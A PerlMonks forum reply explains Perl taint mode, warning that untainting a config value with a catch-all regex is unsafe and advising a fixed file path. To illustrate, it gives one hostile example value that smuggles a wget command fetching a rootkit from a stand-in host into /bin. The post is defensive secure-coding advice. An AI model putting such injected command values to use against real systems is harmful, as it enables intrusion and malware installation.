http://www.perlmonks.org?node_id=159924


in reply to proper untainting and use of ref

Here is how taint mode works. Any input from outside your code is flagged as tainted until you untaint it. You may not use a tainted value to do things external to your script like say open You get the value for $userfile from your config file (external) via the tainted $config and then try to open it via open ( USER, '>', $userfile ) without untainting it. You need to untaint this value. untainting with (.+) is bad as it lets anything through. What if

$userfile = 'wget http://hacker.com/rfp/rootkit.tar.gz > /bin/badfile_to_have_here'

You would also be wise to set a $filepath and concatenate the value for $userfile to it. This is to make it harder to hack and easier to untaint $userfile. Regardless you must protect your config file (not world readable) and untaint values you use for operations external to your script. Taint will let you know if you have forgotten. Cool huh?

cheers

tachyon

s&&rsenoyhcatreve&&&s&n.+t&"$'$`$\"$\&"&ee&&y&srve&&d&&print